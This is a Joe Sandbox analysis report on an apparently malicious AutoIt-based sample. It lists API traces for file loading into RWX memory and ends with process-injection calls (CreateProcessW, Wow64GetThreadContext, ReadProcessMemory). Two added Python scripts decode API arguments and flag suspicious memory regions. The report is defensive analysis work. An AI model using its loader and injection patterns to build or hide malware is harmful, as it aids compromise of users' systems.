                                                                              control_flow_graph 1087 ef2cb8-ef2d66 call ef06d8 1090 ef2d6d-ef2d93 call ef3bc8 CreateFileW 1087->1090 1093 ef2d9a-ef2daa 1090->1093 1094 ef2d95 1090->1094 1101 ef2dac 1093->1101 1102 ef2db1-ef2dcb VirtualAlloc 1093->1102 1095 ef2ee5-ef2ee9 1094->1095 1096 ef2f2b-ef2f2e 1095->1096 1097 ef2eeb-ef2eef 1095->1097 1103 ef2f31-ef2f38 1096->1103 1099 ef2efb-ef2eff 1097->1099 1100 ef2ef1-ef2ef4 1097->1100 1104 ef2f0f-ef2f13 1099->1104 1105 ef2f01-ef2f0b 1099->1105 1100->1099 1101->1095 1106 ef2dcd 1102->1106 1107 ef2dd2-ef2de9 ReadFile 1102->1107 1108 ef2f8d-ef2fa2 1103->1108 1109 ef2f3a-ef2f45 1103->1109 1114 ef2f15-ef2f1f 1104->1114 1115 ef2f23 1104->1115 1105->1104 1106->1095 1116 ef2deb 1107->1116 1117 ef2df0-ef2e30 VirtualAlloc 1107->1117 1112 ef2fa4-ef2faf VirtualFree 1108->1112 1113 ef2fb2-ef2fba 1108->1113 1110 ef2f49-ef2f55 1109->1110 1111 ef2f47 1109->1111 1118 ef2f69-ef2f75 1110->1118 1119 ef2f57-ef2f67 1110->1119 1111->1108 1112->1113 1114->1115 1115->1096 1116->1095 1120 ef2e37-ef2e52 call ef3e18 1117->1120 1121 ef2e32 1117->1121 1124 ef2f77-ef2f80 1118->1124 1125 ef2f82-ef2f88 1118->1125 1123 ef2f8b 1119->1123 1127 ef2e5d-ef2e67 1120->1127 1121->1095 1123->1103 1124->1123 1125->1123 1128 ef2e9a-ef2eae call ef3c28 1127->1128 1129 ef2e69-ef2e98 call ef3e18 1127->1129 1135 ef2eb2-ef2eb6 1128->1135 1136 ef2eb0 1128->1136 1129->1127 1137 ef2eb8-ef2ebc CloseHandle 1135->1137 1138 ef2ec2-ef2ec6 1135->1138 1136->1095 1137->1138 1139 ef2ec8-ef2ed3 VirtualFree 1138->1139 1140 ef2ed6-ef2edf 1138->1140 1139->1140 1140->1090 1140->1095
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EF2D89
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF2FAF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                              • Instruction ID: 3a362be103028bee912dbf3d63ca4c7b36e7a5badac28ad8de11fc12e281d440
                                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                              • Instruction Fuzzy Hash: 2AA1F671E0020DEBDB14CFA4C894BFEBBB5BF48304F209159E615BB280D7759A81CB54

                                                                              Control-flow Graph

                                                                              control_flow_graph 1196 7b49fb-7b4a25 call 7bbcce RegOpenKeyExW 1199 7b4a2b-7b4a2f 1196->1199 1200 8241cc-8241e3 RegQueryValueExW 1196->1200 1201 824246-82424f RegCloseKey 1200->1201 1202 8241e5-824222 call 7cf4ea call 7b47b7 RegQueryValueExW 1200->1202 1207 824224-82423b call 7b6a63 1202->1207 1208 82423d-824245 call 7b47e2 1202->1208 1207->1208 1208->1201
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008241DB
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0082421A
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00824249
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpen
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                              • API String ID: 1586453840-614718249
                                                                              • Opcode ID: 4d0ddb40d3c4d878bff771266455f567bf163cc71e4a23354ed2a56e1a22dc84
                                                                              • Instruction ID: eb6e12ceb9ee71b4df71bddc846573dd9ed998a32751bfac295a8a640309b55a
                                                                              • Opcode Fuzzy Hash: 4d0ddb40d3c4d878bff771266455f567bf163cc71e4a23354ed2a56e1a22dc84
                                                                              • Instruction Fuzzy Hash: 43116D71600208FEEB04ABA4DD9AEEF7BACFF04744F004458B502E6191EA749E41D760
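The API lines in these entries show raw hexadecimal stack slots, which is the form an analyst has to read when deciding what a function actually does (for example the CreateFileW at 00EF2D89 and 00EF2BAA, the VirtualFree at 00EF2FAF, the RegOpenKeyExW at 007B4A1D and the SetTimer at 007B3800). The following Python is an added example and is not part of the Joe Sandbox report or its tooling: it parses lines in the report's "Api.Module(args), ref: addr" form and names the standard Win32 constants behind the leading positional arguments. The parameter tables and the alignment heuristic are mine and cover only the APIs listed. The heuristic exists because the report prints stack slots rather than exactly the API's parameters: some lines carry extra slots, and the CreateFileW line at 00EF2D89 has an extra slot in front of lpFileName, so a purely positional decode would name the wrong values. Lines not in the table are parsed but left undecoded.

```python
import re
from typing import Callable, Dict, List, Optional

# Constructed input: API lines copied verbatim from this report's function entries.
# Slots are 8-digit hex, "?" when the sandbox could not resolve them, or a string.
REPORT_LINES = [
    r"• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EF2BAA",
    r"• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EF2D89",
    r"• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D",
    r"• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF2FAF",
    r"• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B3800",
    r"• CreatePopupMenu.USER32 ref: 007B381F",
]

LINE_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# Standard Win32 constant values (winnt.h, winreg.h, fileapi.h).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
             0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL",
             0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
             0x40000000: "FILE_FLAG_OVERLAPPED"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}
FREE_TYPE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}


def _flags(table: Dict[int, str]) -> Callable[[int], str]:
    """Name every set bit found in the table; bits it does not know stay as hex."""
    def decode(v: int) -> str:
        names = [name for bit, name in table.items() if v & bit]
        rest = v & ~sum(table)
        if rest:
            names.append(f"0x{rest:X}")
        return "|".join(names) or "0"
    return decode


def _enum(table: Dict[int, str]) -> Callable[[int], str]:
    return lambda v: table.get(v, f"0x{v:X}")


def _ms(v: int) -> str:
    return f"{v} ms"


def _raw(v: int) -> str:
    return f"0x{v:X}"


# Parameter names and decoders, in call order, for the APIs seen in the entries.
SPECS: Dict[str, list] = {
    "CreateFileW": [("lpFileName", _raw), ("dwDesiredAccess", _flags(GENERIC)),
                    ("dwShareMode", _flags(FILE_SHARE)), ("lpSecurityAttributes", _raw),
                    ("dwCreationDisposition", _enum(DISPOSITION)),
                    ("dwFlagsAndAttributes", _flags(FILE_ATTR)), ("hTemplateFile", _raw)],
    "RegOpenKeyExW": [("hKey", _enum(HIVES)), ("lpSubKey", _raw), ("ulOptions", _raw),
                      ("samDesired", _flags(KEY_ACCESS)), ("phkResult", _raw)],
    "VirtualFree": [("lpAddress", _raw), ("dwSize", _raw), ("dwFreeType", _flags(FREE_TYPE))],
    "SetTimer": [("hWnd", _raw), ("nIDEvent", _raw), ("uElapse", _ms), ("lpTimerFunc", _raw)],
}
# Plausibility checks used to re-align lines that carry extra slots before the
# first real parameter; a window of decoded values must satisfy them.
CHECKS: Dict[str, Callable[[List[Optional[int]]], bool]] = {
    "CreateFileW": lambda v: v[4] in DISPOSITION and v[2] is not None and v[2] <= 7,
    "RegOpenKeyExW": lambda v: v[0] in HIVES,
}


def _to_int(slot: str) -> Optional[int]:
    return int(slot, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", slot) else None


def decode_line(line: str) -> Optional[dict]:
    """Parse one report line; returns None when the line is not an API line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, argstr, ref = m.groups()
    slots = [s.strip() for s in argstr.split(",")] if argstr else []
    values = [_to_int(s) for s in slots]
    spec, check = SPECS.get(api, []), CHECKS.get(api)
    offset, aligned = 0, True
    if check and spec:                      # slide the window until the check passes
        aligned = False
        for off in range(0, len(slots) - len(spec) + 1):
            if check(values[off:off + len(spec)]):
                offset, aligned = off, True
                break
    params = {}
    for i, (name, dec) in enumerate(spec):
        j = offset + i
        if j >= len(slots):
            break
        params[name] = dec(values[j]) if values[j] is not None else slots[j]
    return {"api": api, "module": module, "ref": ref, "slots": slots, "offset": offset,
            "aligned": aligned, "params": params,
            "surplus": max(0, len(slots) - offset - len(spec))}


def decode_report(lines: List[str]) -> List[dict]:
    return [d for d in (decode_line(l) for l in lines) if d is not None]


if __name__ == "__main__":
    for entry in decode_report(REPORT_LINES):
        flag = "" if entry["aligned"] else " (alignment unknown)"
        print(f"{entry['api']} @ {entry['ref']}{flag}: {entry['params']}")
```

Read with the tables above, the two CreateFileW lines both resolve to GENERIC_READ, full sharing and OPEN_EXISTING on an existing file, the registry call is a read-only open of HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt, the VirtualFree is a MEM_RELEASE, and the timer fires every 750 ms. Any line whose check never passes is reported with aligned set to False rather than silently decoded at offset 0.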

                                                                              Control-flow Graph

                                                                              control_flow_graph 1223 7b36b8-7b3728 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B36E6
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3707
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B371B
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B3724
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 9651d226c5d22bf077a56d510d7100d3f04a1267521de316d2def792ac5665c5
                                                                              • Instruction ID: 859bb525443780c92c95c473fe74374b1b6c1000133881176645065c64b778f9
                                                                              • Opcode Fuzzy Hash: 9651d226c5d22bf077a56d510d7100d3f04a1267521de316d2def792ac5665c5
                                                                              • Instruction Fuzzy Hash: 3CF0DA716406D47AEB31676BAC0DE672E7DF7C6F24B00001EBA08A25B4C56548D9DAB1

                                                                              Control-flow Graph

                                                                              control_flow_graph 1328 ef2a88-ef2bb4 call ef06d8 call ef2978 CreateFileW 1335 ef2bbb-ef2bcb 1328->1335 1336 ef2bb6 1328->1336 1339 ef2bcd 1335->1339 1340 ef2bd2-ef2bec VirtualAlloc 1335->1340 1337 ef2c6b-ef2c70 1336->1337 1339->1337 1341 ef2bee 1340->1341 1342 ef2bf0-ef2c07 ReadFile 1340->1342 1341->1337 1343 ef2c0b-ef2c45 call ef29b8 call ef1978 1342->1343 1344 ef2c09 1342->1344 1349 ef2c47-ef2c5c call ef2a08 1343->1349 1350 ef2c61-ef2c69 ExitProcess 1343->1350 1344->1337 1349->1350 1350->1337
                                                                              APIs
                                                                                • Part of subcall function 00EF2978: Sleep.KERNELBASE(000001F4), ref: 00EF2989
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EF2BAA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: FCMZTFF78INYO8VTDR6UCWW
                                                                              • API String ID: 2694422964-4154250320
                                                                              • Opcode ID: 9190138938cb9c21007523c057a652504bdb33fcff69a6f7a7e6b35d45cb1769
                                                                              • Instruction ID: 8730ccb9185a911c868a57154cffe29f5b1c7b2e17f399324cf25c32fbdd06ff
                                                                              • Opcode Fuzzy Hash: 9190138938cb9c21007523c057a652504bdb33fcff69a6f7a7e6b35d45cb1769
                                                                              • Instruction Fuzzy Hash: 95519070D0428CEAEF11DBA4C959BEEBBB8AF15304F104199E7487B2C1D7B90B44CBA5
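The "Memory Dump Source" names on this page encode, as dot-separated hex fields, what kind of memory each routine was recovered from, and the two regions differ exactly where it matters for triage: 0000000000EF0000 carries 00000040 and 00020000 and is "based on PE: false", while 00000000007B1000 carries 00000020 and 01000000 and is "based on PE: true". The script below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it splits such a name and interprets those two fields with the Win32 PAGE_* and MEM_* constants (the field positions are an assumption inferred from the two names quoted on this page; the fifth and seventh fields are left undecoded), and it flags executable memory that is not image-backed, which is where the CreateFileW/VirtualAlloc/ReadFile routine above and the CreateProcessW/Wow64GetThreadContext routine later on this page both live.

```python
import re
from dataclasses import dataclass

# Win32 memory protection constants (winnt.h); modifier bits such as PAGE_GUARD are masked off below.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
# Win32 memory type constants (winnt.h)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Dump names on this page look like
#   00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp
# ASSUMPTION (inferred from the two names on the page, not documented here):
#   <process idx>.<stage>.<dump id>.<base address>.<protection>.<field5>.<memory type>.<field7>.sdmp
NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class DumpRegion:
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def is_image_backed(self) -> bool:
        return self.mem_type == 0x1000000

    @property
    def is_executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def is_writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE


def parse_dump_name(name: str) -> DumpRegion:
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised dump name: {name}")
    return DumpRegion(base=int(m["base"], 16),
                      protect=int(m["protect"], 16),
                      mem_type=int(m["mtype"], 16))


def triage(name: str) -> dict:
    """Decode the name and add a verdict: executable memory that is not backed by
    a PE image is where injected shellcode and unpacked payloads are found."""
    r = parse_dump_name(name)
    return {
        "base": f"{r.base:#x}",
        "protect": r.protect_name,
        "type": r.type_name,
        "rwx": r.is_executable and r.is_writable,
        "suspicious": r.is_executable and not r.is_image_backed,
    }


# Sample input: the two "Source File" names quoted on this page.
SAMPLES = [
    "00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp",
    "00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for n in SAMPLES:
        print(n.split(".")[3], triage(n))
```

Run against the two names, the 0xEF0000 region decodes as PAGE_EXECUTE_READWRITE private memory (RWX, not image-backed, flagged), and the 0x7B1000 region as PAGE_EXECUTE_READ image memory, i.e. the AutoIt interpreter's own .text section.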
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007B522F
                                                                              • _wcscpy.LIBCMT ref: 007B5283
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B5293
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00823CB0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1053898822-1585850449
                                                                              • Opcode ID: 0d1eab804d4fd9d488dfeeb147d365110bfef71fcf6da1e3e3a55a06f954f7b2
                                                                              • Instruction ID: d9fa9325e4da0d82f337d318e87ce71cced6e67be375724ed101a49141d7d23d
                                                                              • Opcode Fuzzy Hash: 0d1eab804d4fd9d488dfeeb147d365110bfef71fcf6da1e3e3a55a06f954f7b2
                                                                              • Instruction Fuzzy Hash: E931EF71108744AFD721EB64EC4EFEE77E8BB44310F00451EF58982192EB78A688CB96
                                                                              APIs
                                                                                • Part of subcall function 007B41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007B39FE,?,00000001), ref: 007B41DB
                                                                              • _free.LIBCMT ref: 008236B7
                                                                              • _free.LIBCMT ref: 008236FE
                                                                                • Part of subcall function 007BC833: __wsplitpath.LIBCMT ref: 007BC93E
                                                                                • Part of subcall function 007BC833: _wcscpy.LIBCMT ref: 007BC953
                                                                                • Part of subcall function 007BC833: _wcscat.LIBCMT ref: 007BC968
                                                                                • Part of subcall function 007BC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 007BC978
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 805182592-1757145024
                                                                              • Opcode ID: ce8dbfdf0a68e5511966270b32caef181e08537a9884bea0556a82a49de47cad
                                                                              • Instruction ID: 0430b6e12abdef975b0c6f4ceacfe8c4c782943d337b0dafc609417e6d8b4e41
                                                                              • Opcode Fuzzy Hash: ce8dbfdf0a68e5511966270b32caef181e08537a9884bea0556a82a49de47cad
                                                                              • Instruction Fuzzy Hash: 2B913C71910229EBCF04EFA4DC55AEDB7B4FF14310B104429F916E7291DB789A45CB50
                                                                              APIs
                                                                                • Part of subcall function 007B5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00871148,?,007B61FF,?,00000000,00000001,00000000), ref: 007B5392
                                                                                • Part of subcall function 007B49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 007B4A1D
                                                                              • _wcscat.LIBCMT ref: 00822D80
                                                                              • _wcscat.LIBCMT ref: 00822DB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileModuleNameOpen
                                                                              • String ID: \$\Include\
                                                                              • API String ID: 3592542968-2640467822
                                                                              • Opcode ID: 49c0da82ed7738ace0e932b1e859e1814bea5146beb891f8f2074eea46c3025d
                                                                              • Instruction ID: ab1e64950b6ff016ca8bbec05c50d4810e474525abd56c6035e853aec3066630
                                                                              • Opcode Fuzzy Hash: 49c0da82ed7738ace0e932b1e859e1814bea5146beb891f8f2074eea46c3025d
                                                                              • Instruction Fuzzy Hash: 705150B1404344DBC314EF59E98999AB7F4FF59310B80452EF64CC3265EB38E688CB62
                                                                              APIs
                                                                              • __getstream.LIBCMT ref: 007D34FE
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 007D3539
                                                                              • __wopenfile.LIBCMT ref: 007D3549
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                              • String ID: <G
                                                                              • API String ID: 1820251861-2138716496
                                                                              • Opcode ID: 6db5d58624276d18c31c5db7dcca82031e6d209cbe686953d789abd91d95d4a9
                                                                              • Instruction ID: 1627f278913da6bd827b49b07a067db5ce6a8dd9cad05db74d05635de6e417ad
                                                                              • Opcode Fuzzy Hash: 6db5d58624276d18c31c5db7dcca82031e6d209cbe686953d789abd91d95d4a9
                                                                              • Instruction Fuzzy Hash: B411E370A00206DEDB52BF70AC4667E36B4AF45390B158527E81ADB381EA3CCA1197B2
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007CD28B,SwapMouseButtons,00000004,?), ref: 007CD2BC
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007CD28B,SwapMouseButtons,00000004,?,?,?,?,007CC865), ref: 007CD2DD
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,007CD28B,SwapMouseButtons,00000004,?,?,?,?,007CC865), ref: 007CD2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Control Panel\Mouse
                                                                              • API String ID: 3677997916-824357125
                                                                              • Opcode ID: 46701eea66812009029f268e328e13ce9a229da5bb95fc469d5aa92e853edfdf
                                                                              • Instruction ID: a9058e6122e909c926a675cf10229c2ce33886bb932e14530140769c5f7222ac
                                                                              • Opcode Fuzzy Hash: 46701eea66812009029f268e328e13ce9a229da5bb95fc469d5aa92e853edfdf
                                                                              • Instruction Fuzzy Hash: 91112375611218FFDB208FA8DC84EAE7BB8EF44744F10486DA805D7210E635EE419B60
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF2133
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF21C9
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF21EB
                                                                              Memory Dump Source
